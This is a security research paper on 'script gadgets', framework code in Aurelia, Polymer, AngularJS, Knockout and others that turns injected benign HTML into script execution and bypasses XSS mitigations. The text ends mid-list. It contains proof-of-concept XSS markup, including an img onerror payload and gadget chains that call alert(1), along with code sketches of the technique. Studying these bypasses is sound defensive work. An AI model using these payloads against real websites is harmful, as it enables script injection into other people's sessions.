Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting
Mitigations via Script Gadgets
Sebastian Lekies
Google
Krzysztof Kotowicz
Google
Samuel Groß
SAP
mail@samuel-gross.com
Eduardo A. Vela Nava
Google
Martin Johns
SAP
ABSTRACT
Cross-Site Scripting (XSS) is an unremitting problem for the Web.
From its initial public documentation in 2000 until now, XSS has
continuously ranked at the top of vulnerability statistics. Even though
there has been a considerable amount of research [15, 18, 21] and
developer education to address XSS on the source code level, the
overall number of discovered XSS problems remains high. Because
of this, various approaches to mitigate XSS [14, 19, 24, 28, 30] have
been proposed as a second line of defense, with HTML sanitizers,
Web Application Firewalls, browser-based XSS filters, and the
Content Security Policy being some prominent examples. Most of
these mechanisms focus on script tags and event handlers, either
by removing them from user-provided content or by preventing
their script code from executing.
In this paper, we demonstrate that this approach is no longer
sufficient for modern applications: We describe a novel Web attack
that can circumvent all of these currently existing XSS mitigation
techniques. In this attack, the attacker abuses so-called script
gadgets (legitimate JavaScript fragments within an application’s
legitimate code base) to execute JavaScript. In most cases, these
gadgets utilize DOM selectors to interact with elements in the Web
document. Through an initial injection point, the attacker can inject
benign-looking HTML elements which are ignored by these mitiga-
tion techniques but match the selector of the gadget. This way, the
attacker can hijack the input of a gadget and cause processing of his
input, which in turn leads to code execution of attacker-controlled
values. We demonstrate that these gadgets are omnipresent in al-
most all modern JavaScript frameworks and present an empirical
study showing the prevalence of script gadgets in production code.
As a result, we assume most mitigation techniques in web applica-
tions written today can be bypassed.
CCS CONCEPTS
• Security and privacy → Browser security; Web application
security; Intrusion detection systems; Firewalls; Penetration testing;
Web protocol security;
Permission to make digital or hard copies of part or all of this work for personal or
classroom use is granted without fee provided that copies are not made or distributed
for profit or commercial advantage and that copies bear this notice and the full citation
on the first page. Copyrights for third-party components of this work must be honored.
For all other uses, contact the owner/author(s).
CCS’17, Oct. 30–Nov. 3, 2017, Dallas, Texas, USA
© 2017 Copyright held by the owner/author(s). ISBN 978-1-4503-4946-8/17/10.
DOI: http://dx.doi.org/10.1145/3133956.3134091
1 INTRODUCTION
Web technology is moving forward at a rapid pace. Every day, new
frameworks and APIs are pushed to production. This constant
development also leads to a change in attack surface and
vulnerabilities. In this process, Cross-Site Scripting (XSS) vulnerabilities
have evolved significantly in recent years. The traditional
reflected XSS issue is very different from modern DOM-based XSS
vulnerabilities such as mXSS [12], or expression-language-based
XSS [10]. While the topic of XSS becomes increasingly complex,
many mitigation techniques only focus on the traditional and
well-understood reflected XSS variant.
In this paper, we present a novel Web attack which demonstrates
that many mitigation techniques are ineffective when confronted
with modern JavaScript libraries. At the core of the presented attack
are so-called script gadgets, small fragments of JavaScript contained
in the vulnerable site’s legitimate code. Generally speaking, a script
gadget is a piece of JavaScript code which reacts to the presence
of specifically formed DOM content in the Web document. In a
gadget-based attack, the adversary injects apparently harmless
HTML markup into the vulnerable Web page. Since the injected
content does not carry directly executable script code, it is ignored
by the current generation of XSS mitigations. However, during
the web application lifetime, the site’s script gadgets pick up the
injected content and involuntarily transform its payload into exe-
cutable code. Thus, script gadgets introduce the practice of code-reuse
attacks [27], comparable to return-to-libc, to the Web.
To explore the severity and prevalence of the underlying vul-
nerability pattern, we conduct a qualitative and quantitative study
of script gadgets. For this, we first identify the various gadget
types, considering their functionality and their potential to
undermine existing XSS mitigations. Furthermore, we examine 16
popular JavaScript frameworks and libraries, focusing on contained
script gadgets and mapping the found gadget instances to the
affected XSS mitigations. For instance, in 13 out of the 16 examined
code bases we found gadgets capable of circumventing the emerging
strict-dynamic variant of the Content Security Policy [34]. Finally,
we report on a large-scale empirical study on the prevalence
of script gadgets in popular web sites.
By crawling the Alexa top 5000 Web sites and their first-level
links, we measured gadget-related data flows for approximately
650,000 individual crawled URLs. In total, we measured 4,352,491
sink executions with data retrieved from the DOM. Using our fully
automated exploit generation framework, we generated exploits
and verified gadgets on 19.88% of all domains in the data set. As
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
we applied a very conservative, but false-positive-free verification
approach, we believe that this number is just a lower bound and
that the number of gadgets is considerably higher in practice.
In particular, this paper makes the following contributions:
• To the best of our knowledge, we are the first researchers to
systematically explore this new Web attack, which allows an attacker to
circumvent popular XSS mitigation techniques by abusing
script gadgets. We describe the attack in detail and give a
categorization of different types of gadgets.
• In order to explore script gadgets in detail, we present the
results of a manual study on 16 modern JavaScript libraries.
Based on proof-of-concept exploits we demonstrate that
almost all of these libraries contain gadgets. Furthermore,
we demonstrate how these different script gadgets can
be used to circumvent all four popular classes of mitigation
techniques: the Content Security Policy, HTML sanitizers,
browser-based XSS filters and Web Application Firewalls.
• Based on the results of the manual study, we built a tool
chain capable of automatically detecting and verifying gadgets
at scale. Based on this tool, we conducted an empirical
study of the Alexa top 5000 Web sites including more than
650k Web pages. The results of this study suggest that
script gadgets are omnipresent in modern JavaScript-heavy
applications. While our study is very conservative when
measuring gadgets, we managed to detect and verify gadgets
in 19.88% of all domains. This number just represents
a lower bound and is likely much higher in practice.
2 TECHNICAL BACKGROUND
2.1 JavaScript, HTML and the DOM
Since its development, JavaScript has been used to interact
with the DOM to make HTML documents more interactive.
To do this, JavaScript working in the browser uses many
different ways to read data from the DOM. Most of the
corresponding functions, such as document.getElementById or
document.getElementsByClassName, are based on DOM
selectors [33], conceptually providing convenient wrappers around
document.querySelectorAll.
DOM selectors are a powerful pattern language that can be used
to query the DOM for certain elements, and therefore are the basis
for all modern JavaScript frameworks. For example, one of the most
famous JavaScript functions, jQuery’s $ function, enhances the
browser-based selector language with a lot of syntactic sugar. In
the following table, we describe some selector features in detail:
Selector      E.g.    Matches...
Tag-based     div     div elements
Id-based      #foo    elements with id ’foo’
Class-based   .foo    elements with class ’foo’
Attr.-based   [foo]   elements with an attribute named ’foo’
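The four selector forms in the table can be illustrated with a minimal sketch. It does not use the browser's selector engine (in a browser, document.querySelectorAll does this work); instead it assumes a hypothetical in-memory list of elements so that it runs outside a browser. The names elements, matchesSelector and querySelectorAllSketch are our own illustrative choices, not part of any library.

```javascript
// Hypothetical stand-in for a DOM: each element has a tag name and attributes.
const elements = [
  { tag: "div", attrs: { id: "foo" } },
  { tag: "span", attrs: { class: "foo bar" } },
  { tag: "a", attrs: { foo: "", href: "/home" } },
];

// Matches one element against one of the four simple selector forms
// from the table: tag, #id, .class, and [attribute].
function matchesSelector(el, selector) {
  if (selector.startsWith("#")) {
    return el.attrs.id === selector.slice(1);
  }
  if (selector.startsWith(".")) {
    const classes = (el.attrs.class || "").split(/\s+/);
    return classes.includes(selector.slice(1));
  }
  if (selector.startsWith("[") && selector.endsWith("]")) {
    const name = selector.slice(1, -1);
    return Object.prototype.hasOwnProperty.call(el.attrs, name);
  }
  return el.tag === selector.toLowerCase();
}

// Returns all elements matching the selector, similar in spirit to
// document.querySelectorAll but limited to the forms above.
function querySelectorAllSketch(selector) {
  return elements.filter((el) => matchesSelector(el, selector));
}
```

The attribute-based form matters most for the attacks discussed later: an injected element only needs to carry the right attribute name to be picked up by application code.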
2.2 Cross-site Scripting (XSS)
The term Cross-site Scripting (XSS) [29] describes a class of
string-based code injection vulnerabilities that let adversaries inject HTML
and/or JavaScript into Web content that is not legitimately under
their control. XSS vulnerabilities are generally categorized based on
the location of the vulnerable source code, i.e., server- or client-side
XSS, and the persistence of the injected attack code, i.e., reflected
or stored XSS.
XSS can be avoided through secure coding practices, which
mainly rely on the careful handling of attacker controlled input
and context-aware sanitization/encoding of untrusted data before
processing it in a security sensitive context. For brevity, we’ll omit
further details on the basic vulnerability class and refer to the vast
body of existing work on the topic [7, 8, 17, 18, 21, 31].
2.3 XSS Mitigation Techniques
The basic XSS problem has been recognized since the beginning
of the decade [5], the root cause is understood, and a significant
amount of work has been done to design approaches to detect and
prevent XSS issues in source code. However, XSS is statistically still
the most common vulnerability class, and there seems to be no
overall decline in its prevalence. It therefore seems safe to assume
that XSS problems will not be solved completely with secure coding
practices alone.
For this reason various XSS mitigations have been introduced as
an important second line of defense. Instead of removing the under-
lying vulnerability, XSS mitigations aim to prevent the exploitation
of the vulnerability by stopping the execution of the injected script
code. XSS mitigations are widely implemented in four different
forms:
(1) HTML Sanitizers. These are libraries used by developers
to clean untrusted HTML into HTML that is safe to use
within the application. This category contains examples
such as DOMPurify¹ and the Google Closure² HTML sanitizer.
(2) Browser XSS Filters. These filters are implemented as
part of the browser navigation and rendering, and they
attempt to detect an XSS attack and neuter it. Internet
Explorer, Edge, and Chrome implement XSS filters as part
of their default configuration. Firefox does not have one,
but the popular NoScript³ add-on implements one.
(3) Web Application Firewalls. This is software that runs on
the server and attempts to allow benign requests from web
traffic, while detecting and blocking malicious requests. An
example of an open-source Web Application Firewall is
ModSecurity⁴ with the OWASP Core Rule Set⁵.
(4) Content Security Policy [34]. This is a browser feature
that a web developer can configure to define a policy that
allows the browser to whitelist the JavaScript code that
belongs to the application.
These mitigations all fundamentally rely on one of three basic
strategies:
(1) Request filtering blocks HTTP requests before they
reach the application, working either at the browser level
(like NoScript), or at the network or application level (like
WAFs).
(2) Response sanitization focuses on detecting malicious
code and sanitizing it out of the response. Examples of
these are HTML sanitizers, as well as Internet Explorer’s
and Edge’s XSS filter.
(3) Code filtering inspects JavaScript just before it
is executed and tries to determine whether it is benign or not.
Examples of this strategy include CSP and Chrome’s XSS
filter.
We go into more detail on the implementation of these
strategies and the ways to bypass them in Section 4.
¹ https://github.com/cure53/DOMPurify
² https://github.com/google/closure-library
³ https://noscript.net/
⁴ https://modsecurity.org/
⁵ https://github.com/SpiderLabs/owasp-modsecurity-crs
3 SCRIPT GADGETS
In this section, we introduce the concept of script gadgets,
explaining how injecting benign HTML markup may result in arbitrary
JavaScript execution by reusing parts of legitimate application code
and how this can be used to negate the effects of XSS mitigations.
3.1 Benign HTML markup
XSS mitigation techniques described in Section 2.3 aim to stop XSS
attacks by blocking execution of illegitimate, injected JavaScript
code. Mitigations detect the injected code, present in inline event
handlers or in separate script elements, and prevent its execution,
while legitimate JavaScript code, carrying appropriate trust
information, is left as-is and is allowed to execute.
Those XSS mitigations ignore injected HTML markup that would
not result in JavaScript execution; we’ll call such markup benign
HTML. Benign HTML does not contain <script> tags, inline event
handlers, src or href attributes with javascript: or data: URLs,
or other tags capable of JavaScript execution (<link rel=import>,
<meta>, <style>). The following snippet is an example of benign
HTML:
<div class="greeting">
<b>Hello</b> world!
</div>
Listing 1: Benign HTML markup ignored by the mitigation
3.2 DOM selectors
The presence of benign HTML in a document does not directly
trigger code execution. However, in virtually all web applications
JavaScript code already present in the page interacts with the DOM,
reading data from the document by using various DOM selectors
(Section 2.1). For example, a web application might take all elements
with a tooltip attribute to decorate them by showing a given text when
the user selects these elements. JavaScript code reading data from
the DOM based on a selector is a common pattern in both user-land
and library code. Example code snippets might look like this:
// Userland code
var button = document.getElementById("button");
button.getAttribute("data-text");
var links = $("a[href]").children();
// Reading 'ref' attributes in Aurelia framework
if (attrName === 'ref') {
  info.attrName = attrName;
  info.attrValue = attrValue;
  info.expression = new NameExpression(
    this.parser.parse(attrValue), 'element',
    resources.lookupFunctions);
}
// Vue.js reading from v-html attribute
if ((binding = el.attrsMap['v-html'])) {
  return [{ type: EXPRESSION, value: binding }]
}
Listing 2: Reading data from the DOM
By injecting benign HTML markup matching DOM selectors
used in the application we are able to trigger the execution of
specific pieces of legitimate application code⁶: so-called script gadgets.
3.3 Script Gadgets - Introduction
Script gadgets are fragments of legitimate JavaScript code belonging
to the web application that execute as a result of benign HTML
markup present in the web page. Script gadgets are not injected
by the attacker - they are already present either in the user-land
web application code, or one of the libraries/frameworks used by
the web application.
Our research explores using script gadgets to bypass XSS miti-
gations. In order to do that, gadgets must both result in arbitrary
script execution, and be triggered from benign HTML injection.
For example, a web application might assign a value read from the
DOM to the innerHTML property of an element:
var button = document.getElementById("my-button");
button.innerHTML = button.getAttribute("data-text");
Listing 3: Simple innerHTML gadget
Simple gadgets like these are often explored in the context of
DOM XSS vulnerabilities [16], but for the purpose of this research
we propose a new classification of gadgets of varying complexity.
But first we’ll explain how to use script gadgets in attacks against
XSS mitigations.
⁶ An alternative way of triggering specific code paths in a web application from benign
markup is DOM clobbering. DOM clobbering allows markup to override variables
in the JavaScript execution environment, making it possible to trigger specific script
behavior. While we have identified working bypasses of some XSS mitigations via
DOM clobbering, for clarity we focus only on DOM selector-based code triggers.
3.4 Attack Outline
In this paper, we introduce a novel XSS attack that relies on script
gadgets to cause the execution of the adversary’s JavaScript code.
Attacker model: The applicable attacker is the classic XSS
attacker [29], who is able to inject arbitrary HTML code into the
content of the attacked web document. In the context of this paper,
whether the injection technique used is reflected or stored XSS is
irrelevant.
As discussed above, existing XSS mitigations rely on the basic
assumption that malicious code is being directly injected into the
affected page in the course of an XSS attack. All non-script-carrying,
injected HTML content is therefore assumed to be benign and
remains untouched by the mitigation. This assumption is exploited
by the proposed attack method. The HTML code injected by the
attacker exhibits two characteristics:
(1) The actual attack payload, for example the attack’s
JavaScript, is contained in the benign HTML in a
non-executable form.
(2) The HTML is specifically crafted so that its presence in
the web document triggers a script gadget already
contained in the web page’s legitimate JavaScript code. In other
words, the injected HTML payload triggers a code-reuse
attack, similar to ret2libc techniques used in exploitation
of memory-corruption vulnerabilities.
In the course of an attack, a script gadget accesses the injected
DOM content and uses the contained information in an insecure
manner, ultimately leading to the execution of the adversary’s code,
which was hidden in the benign HTML code. In summary, the class
of attacks described in this paper follows this basic pattern:
(1) Injection into the raw HTML. The attacker controls the
DOM of the webpage and injects a payload that triggers
script gadgets in the application code. This payload
contains only benign HTML markup and matches the DOM
selectors used by the web application.
(2) Mitigation attempt. An XSS mitigation inspects the
injected content, trying to detect script insertion. The benign
HTML markup is left as-is.
(3) Gadgets transform the markup. Gadgets present in
the legitimate JavaScript code take the injected payload
from the DOM using the DOM selectors and transform it
into JavaScript statements.
(4) Script executes. The transformed JavaScript statements
are executed, resulting in XSS.
The precise ways to abuse gadgets to bypass XSS mitigations
depend on the type of mitigation and the implemented mitigation strategy,
as we described in Section 2.3.
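The four steps of the attack outline can be traced in a small simulation. This is a sketch under strong assumptions: the DOM element is modelled as a plain object, the mitigation is a deliberately simplified check following the definition of benign HTML in Section 3.1 (it is not how any real sanitizer or filter works), and the sink is a plain object whose innerHTML property merely records the value. All names (injected, mitigationAllows, gadget, sink) are hypothetical.

```javascript
// Step 1: markup injected by the attacker, modelled as a plain object.
// The payload sits in a data attribute value, i.e. in non-executable form.
const injected = {
  tag: "div",
  attrs: { id: "my-button", "data-text": "<img src=x onerror=alert(1)>" },
};

// Step 2: a simplified mitigation. It rejects script-capable tags, inline
// event handlers, and javascript:/data: URLs, and accepts everything else.
function mitigationAllows(el) {
  const forbiddenTags = new Set(["script", "link", "meta", "style"]);
  if (forbiddenTags.has(el.tag.toLowerCase())) return false;
  for (const [name, value] of Object.entries(el.attrs)) {
    const lower = name.toLowerCase();
    if (lower.startsWith("on")) return false;
    if ((lower === "src" || lower === "href") &&
        /^\s*(javascript|data):/i.test(value)) {
      return false;
    }
  }
  return true;
}

// Step 3: a gadget in the style of Listing 3. It reads the attribute
// value and writes it into an HTML sink.
function gadget(el, target) {
  target.innerHTML = el.attrs["data-text"];
}

// Step 4: in a browser, assigning this string to a real element's
// innerHTML would parse the markup and run the onerror handler.
// Here the sink only records what it received.
const sink = { innerHTML: "" };
const allowed = mitigationAllows(injected);
if (allowed) {
  gadget(injected, sink);
}
```

The mitigation never sees a script element or an event handler attribute on the injected element; the executable form only comes into existence after the legitimate gadget has copied the attribute value into the sink.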
3.5 Gadget Types
We identified several types of script gadgets useful in bypassing XSS
mitigations. Some of them may result in indirect script execution
on their own; others need to be combined in chains to be useful in
an attack.
3.5.1 String manipulation gadgets. These gadgets transform
their string input by using regular expressions, character
replacement and other types of string manipulation. When present, they
can be used to bypass mitigations based on pattern matching. For
example, the following gadget can be used to bypass some
mitigations by using the inner-h-t-m-l attribute name, which the
Polymer framework later camel-cases and uses to assign to the
element’s innerHTML property.
dash.replace(/-[a-z]/g, (m) => m[1].toUpperCase())
Listing 4: Camel-casing the input in Polymer
Similar features are present in the AngularJS framework, which
allow attackers to use benign data- attributes in place of ng-
attributes that would be blocked by HTML sanitizers:
var PREFIX_REGEXP = /^((?:x|data)[:\-_])/i;
var SPECIAL_CHARS_REGEXP = /[:\-_]+(.)/g;
function directiveNormalize(name) {
  return name.replace(PREFIX_REGEXP, '')
    .replace(SPECIAL_CHARS_REGEXP, fnCamelCaseReplace);
}
Listing 5: Directive name normalization in AngularJS
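To make the effect of Listings 4 and 5 concrete, the following sketch applies both transformations to attribute names and compares the outcome with a pattern-matching filter. Several parts are assumptions: the helper name dashToCamelCase is ours, the body of fnCamelCaseReplace is not shown in Listing 5 and is filled in with a plausible definition, and naiveFilterBlocks is a hypothetical filter that only knows the canonical attribute names.

```javascript
// Camel-casing in the style of Listing 4 (helper name is hypothetical).
function dashToCamelCase(dash) {
  return dash.replace(/-[a-z]/g, (m) => m[1].toUpperCase());
}

// Normalization in the style of Listing 5.
const PREFIX_REGEXP = /^((?:x|data)[:\-_])/i;
const SPECIAL_CHARS_REGEXP = /[:\-_]+(.)/g;

// Assumption: Listing 5 does not show this helper; this definition
// upper-cases the character that follows a separator.
function fnCamelCaseReplace(all, letter) {
  return letter.toUpperCase();
}

function directiveNormalize(name) {
  return name
    .replace(PREFIX_REGEXP, "")
    .replace(SPECIAL_CHARS_REGEXP, fnCamelCaseReplace);
}

// Hypothetical pattern-matching filter: blocks ng- attributes and the
// literal innerHTML name, but knows nothing about alternative spellings.
function naiveFilterBlocks(attrName) {
  return /^ng-/i.test(attrName) || attrName.toLowerCase() === "innerhtml";
}
```

Under these assumptions, data-ng-click and inner-h-t-m-l both pass the filter, yet the string manipulation gadgets map them to ngClick and innerHTML respectively, the same names the filter was meant to keep out.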
3.5.2 Element construction gadgets. These gadgets create new
DOM elements. For XSS mitigation bypass purposes, we’re mostly
focused on identifying gadgets that may programmatically create
new script elements.
document.createElement(input)
document.createElement("script")
jQuery("<" + tag + ">")
jQuery.html(input) // if input contains <script>
Listing 6: Example element creation gadgets
One notable element construction gadget is present in jQuery’s
$.globalEval function. This function creates a new script element,
sets its text property and appends the element to the DOM,
executing the code. $.globalEval combines an element creation
gadget with a JavaScript execution gadget (3.5.4). As $.globalEval
is called in various common jQuery methods (e.g. $.html), a
controlled input to those may create new script elements, which is a
useful property for bypassing strict-dynamic CSP (see 4.4).
3.5.3 Function creation gadgets. These gadgets create new
Function objects. The function body is usually composed of a mix
of the input and constant strings. Note that the created function
object needs to be executed by a different gadget.
// Knockout Function creation gadget.
var body = "with($context){with($data||{}){return{" +
rewrittenBindings + "}}}";
return new Function("$context", "$element", body);
// Underscore.js Function creation gadget.
source = "var __t,__p='',__j=Array.prototype.join," +
"print=function(){__p+=__j.call(arguments,'');};\n" +
source + 'return __p;\n';
var render = new Function(
settings.variable || 'obj', '_', source);
Listing 7: Example function creation gadgets
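The following sketch shows why a function creation gadget needs a second gadget to complete the attack. It reuses the string template from the Knockout snippet in Listing 7, but everything around it is an assumption: createBindingsFunction, the context object and the record helper are hypothetical names, and the binding strings stand in for attribute values an attacker could place in benign markup.

```javascript
// Function creation gadget modelled on the Knockout snippet in Listing 7:
// the binding string becomes part of the body of a new Function object.
function createBindingsFunction(rewrittenBindings) {
  const body =
    "with($context){with($data||{}){return{" + rewrittenBindings + "}}}";
  return new Function("$context", "$element", body);
}

// Hypothetical view model. record() stands in for any function that is
// reachable from the binding scope.
const sideEffects = [];
const context = {
  $data: {
    name: "Alice",
    record: (message) => sideEffects.push(message),
  },
};

// A legitimate binding simply reads a property of the view model.
const benign = createBindingsFunction("text: name")(context, null);

// An attacker-controlled binding string. Creating the function does not
// run the payload yet ...
const malicious = createBindingsFunction("text: record('attacker code ran')");
const effectsBeforeCall = sideEffects.length;

// ... only a later gadget that invokes the function object does.
malicious(context, null);
```

Creation and invocation are separate steps, which is why function creation gadgets typically appear in the middle of a gadget chain rather than at its end.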
3.5.4 JavaScript execution sink gadgets. These gadgets are usu-
ally standalone, or are the last in the constructed gadget chain,
taking the input from the previous gadgets and putting it into a
DOM XSS [16] JavaScript execution sink.
eval(input);
inputFunction.apply();
node.innerHTML = "prefix" + input + "suffix";
jQuery.html(input);
scriptElement.src = input;
node.appendChild(input);
Listing 8: Example execution sink gadgets
3.5.5 Gadgets in expression parsers. Some modern JavaScript
frameworks (for example, Aurelia⁷, AngularJS⁸, Polymer⁹,
Ractive.js¹⁰, Vue.js¹¹) interpret parts of the DOM tree as templates for
the application UI components. Those templates contain
expressions written in framework-specific expression languages to bind the
result of expression evaluation to a given position in the rendered
UI. For example, the following expression displays a capitalized
customer name:
<td>${customer.name.capitalize()}</td>
Listing 9: Sample expression in Aurelia
The framework extracts the template definition from the DOM,
identifies embedded expressions by searching for appropriate code
delimiters (here: ${ and }), parses the expressions into an AST, and
evaluates them when the UI is rendered.
⁷ http://aurelia.io/
⁸ https://angularjs.org/
⁹ https://www.polymer-project.org/
¹⁰ http://www.ractivejs.org/
¹¹ https://vuejs.org/
If the expression language syntax is expressive enough, attackers
can create expressions resulting in arbitrary JavaScript code
execution, for example by traversing a prototype chain or accessing
object constructors [9, 10]. We found that various script gadgets
that can lead to arbitrary code execution can typically be identified
in the framework’s expression parsing and evaluation engine. For
example, the following gadgets can be found in Aurelia’s expression
parser:
if (this.optional('.')) { // Property access
  result = new AccessMember(result, name);
}
AccessMember.prototype.evaluate = function(...) {
  return instance[this.name];
};
if (this.optional('(')) { // Function call
  result = new CallMember(result, name, args);
}
CallMember.prototype.evaluate = function(...) {
  return func.apply(instance, args);
};
Listing 10: Script gadgets in Aurelia expression parser (simplified code)
It’s possible to link the above script gadgets into chains that
execute arbitrary functions such as window.alert, all by using
only benign HTML markup injection. (Aurelia looks for ref and
*.bind attributes in the document, which triggers our gadgets.)
<div ref=me
s.bind="$this.me.ownerDocument.defaultView.alert(1)"
></div>
Listing 11: HTML Markup triggering gadget chain in Aurelia
In a similar fashion, the following benign HTML markup may
trigger a gadget chain calling alert in Polymer 1.x:
<template is=dom-bind><div
c={{alert('1',ownerDocument.defaultView)}}
b={{set('_rootDataHost',ownerDocument.defaultView)}}>
</div></template>
Listing 12: HTML Markup triggering gadget chain in Polymer 1.x
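How property access and function call gadgets combine into a chain can be sketched with a toy expression evaluator. The class names AccessMember and CallMember are taken from Listing 10, but the code below is our own heavily reduced model and not Aurelia's parser: parseSketch only understands dotted paths starting at $this with one optional trailing call, AccessThis is a hypothetical helper, and fakeWindow replaces the real window object so that the sketch runs outside a browser.

```javascript
// Root of every expression in this sketch: evaluates to the binding scope.
class AccessThis {
  evaluate(scope) {
    return scope;
  }
}

// Property access gadget: returns instance[name], whatever name is.
class AccessMember {
  constructor(object, name) {
    this.object = object;
    this.name = name;
  }
  evaluate(scope) {
    const instance = this.object.evaluate(scope);
    return instance[this.name];
  }
}

// Function call gadget: looks up a member and applies it to the arguments.
class CallMember {
  constructor(object, name, args) {
    this.object = object;
    this.name = name;
    this.args = args;
  }
  evaluate(scope) {
    const instance = this.object.evaluate(scope);
    const func = instance[this.name];
    return func.apply(instance, this.args);
  }
}

// Toy parser for expressions such as "$this.a.b.f(1)". Arguments must be
// JSON literals. This is an illustration only.
function parseSketch(expression) {
  const call = /^(.*)\.([A-Za-z_$][\w$]*)\((.*)\)$/.exec(expression);
  const path = (call ? call[1] : expression).split(".");
  let result = new AccessThis(); // path[0] is assumed to be "$this"
  for (const name of path.slice(1)) {
    result = new AccessMember(result, name);
  }
  if (call) {
    const args = call[3] === "" ? [] : JSON.parse("[" + call[3] + "]");
    result = new CallMember(result, call[2], args);
  }
  return result;
}

// Stand-ins for the browser objects reached by the payload in Listing 11.
const alerts = [];
const fakeWindow = { alert: (message) => alerts.push(message) };
const fakeElement = { ownerDocument: { defaultView: fakeWindow } };
const scope = { me: fakeElement }; // models the effect of ref=me

parseSketch("$this.me.ownerDocument.defaultView.alert(1)").evaluate(scope);
```

Each individual gadget is harmless on its own; it is the attacker-chosen sequence of property names that walks from the referenced element to the global object and calls one of its functions.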
3.6 Expressiveness of Gadget-based Exploits
In this section we discuss the expressiveness of gadget-based miti-
gation bypasses. Via gadgets, an attacker is able to execute arbitrary,
Turing-complete code. In general, we identified three ways of doing
so:
• Eval-like functions: If a gadget is able to trigger a call
to eval or another eval-like function, executing arbitrary
code is straightforward. In our examples, we usually
demonstrate how the gadget is able to call a single function
inside the window object with a single attacker-controlled
parameter (e.g. alert(1)). As the eval function is also
located inside the window object and accepts one or more
parameters, all of these examples are capable of executing
arbitrary, Turing-complete JavaScript code.
• Appending a script element: Another class of gadgets
aims at appending a script element with either an
attacker-controlled src attribute or an attacker-controlled script
body. Similar to eval-based gadgets, this allows an attacker
to execute arbitrary code.
• Abusing the expressiveness of an expression language:
Most gadget-based mitigation bypasses leverage
eval-like functions or new script elements. However, in
Web applications employing some variants of CSP (see
Section 4.1.1), it is not possible to use these bypass methods. In
these cases, we can leverage expression languages to gain
arbitrary code execution. All expression languages that we
investigated are Turing-complete. If an exploit is able to
execute the expression interpreter, the exploit is as
expressive as the expression language itself. However, even if the
expression language itself is not Turing-complete, we can
still gain Turing-complete code execution in some cases.
Listing 17, for example, shows a very simple
expression-based attack to steal and reuse a CSP nonce in order to
add a seemingly trusted script that allows us to achieve
arbitrary JavaScript code execution.
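The argument for eval-like functions can be checked with a few lines of code. The sketch assumes a hypothetical gadget, callGlobalWithOneArg, that is only able to call one function of the global object with one string argument; globalThis is used in place of window so the example also runs outside a browser, and it assumes an environment in which eval is not disabled (for example by a CSP without unsafe-eval).

```javascript
// Hypothetical gadget: calls a single function of the global object
// with a single attacker-controlled argument.
function callGlobalWithOneArg(functionName, argument) {
  return globalThis[functionName](argument);
}

// The same primitive that would call alert(1) in a browser can call eval,
// and the single string argument can hold an arbitrary program.
const program = "[1, 2, 3].map((x) => x * 2).join(',')";
const evalResult = callGlobalWithOneArg("eval", program);
```

Because the string passed to eval may contain loops, function definitions and further calls, a one-function, one-argument primitive is already as expressive as JavaScript itself.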
3.7 Finding Script Gadgets
Script gadgets (3.3) on their own are legitimate, trusted JavaScript
statements or code blocks. While some of them (3.5.4) are also
DOM XSS [16] sinks, others are as benign as property assignment
or property traversal statements. This fact makes it particularly
difficult to identify such gadgets in the web application codebase.
We found the following two techniques are useful to identify
script gadgets:
3.7.1 Manual code inspection. First of all, gadgets can be found
manually or with the assistance of static-analysis tools. Finding
some of the simpler gadget types (for example, JS execution sinks or
Function creation gadgets) is straightforward. We found that more
complex gadgets, especially the ones present in expression parsers,
require significant effort to locate and evaluate for usefulness. A
gadget may only be used if it’s reachable from a benign HTML
markup injection. For example, any property access, property setter,
or function call may potentially be useful in a chain, but only if the
property name or function object may be directly controlled from
the markup.
We found that manual code inspection makes it possible to find
gadgets that would not otherwise be triggered in the usual
application code flow. For example, in Polymer 1.x (see Listing 12) we were
able to determine that overriding a _rootDataHost property lets us
execute JavaScript statements in a different scope, which lets us
trigger subsequent gadgets in the chain. This "private" _rootDataHost
property was never meant to be accessible from Polymer
expressions.
In this research, we used manual code inspection to identify
gadgets in modern JavaScript frameworks (4.1).
3.7.2 Taint tracking. A subset of gadgets may be identified by
rendering the web application in a browser enriched with a
taint-tracking engine [17]. By marking the entirety of the DOM tree as tainted
(i.e. simulating that the attacker has a reflected HTML injection
capability), and checking whether tainted values reach specific
JavaScript execution sinks, we were able to identify flows linking
certain DOM selectors with JavaScript execution. While this
approach is effective at scale, it has the limitation of only discovering
gadgets that are already used in a given web application (albeit not
necessarily for script execution).
In this research, we used the taint tracking approach to evaluate
script gadget prevalence in user-land code (5.4).
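The idea behind the taint tracking approach can be sketched at the library level. The engine used in this research works inside the browser; the code below is only a simplified model with hypothetical names (Tainted, fromDom, concat, sink, flows), in which every value read from the DOM remembers the selector it was read through and every sink reports tainted input.

```javascript
// A tainted value remembers which DOM selectors its data came from.
class Tainted {
  constructor(value, selectors) {
    this.value = value;
    this.selectors = selectors;
  }
}

// Source: every value read from the DOM is marked as tainted.
function fromDom(selector, value) {
  return new Tainted(value, [selector]);
}

// Propagation: concatenating with a tainted value yields a tainted value.
function concat(...parts) {
  let value = "";
  const selectors = [];
  for (const part of parts) {
    if (part instanceof Tainted) {
      value += part.value;
      selectors.push(...part.selectors);
    } else {
      value += part;
    }
  }
  return selectors.length > 0 ? new Tainted(value, selectors) : value;
}

// Sink: record a flow whenever tainted data reaches an execution sink.
const flows = [];
function sink(name, data) {
  if (data instanceof Tainted) {
    flows.push({ sink: name, selectors: data.selectors, value: data.value });
  }
}

// A flow from a DOM selector into an HTML sink is reported ...
sink("innerHTML", concat("<b>", fromDom("#my-button[data-text]", "hello"), "</b>"));
// ... while a constant string reaching eval is not.
sink("eval", "1 + 1");
```

Each recorded flow links a selector to a sink, which is the information needed to craft markup that matches the selector and to check whether the resulting value is executed.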
4 CONCRETE XSS MITIGATION BYPASSES
USING SCRIPT GADGETS
In this section, we provide detailed information on how script gad-
gets can be leveraged to circumvent concrete state-of-the-art XSS
mitigations. We’ll follow the countermeasure classications, based
on their underlying mechanisms, that we introduced in Section 2.3.
4.1 Gadgets in Popular JavaScript Libraries
In order to measure the effectiveness of gadgets in bypassing XSS
mitigations, we needed to collect:
(1) A list of XSS mitigation implementations with different
strategies
(2) A list of as many gadgets as possible in popular frameworks
and libraries
4.1.1 Collecting a list of popular XSS mitigations. We selected
XSS mitigations that were either open-source, or widely distributed.
We also wanted a cross-section of different mitigation implementation
strategies. The mitigations we decided to test were:
• Content Security Policy using different types of code
  filtering:
  - Whitelist-based, where code is trusted based on
    where it originates.
  - Nonce-based, where code is trusted only if it’s
    accompanied by a secret cryptographic nonce.
  - The unsafe-eval source expression is usually used
    together with other policies, but looking at it separately
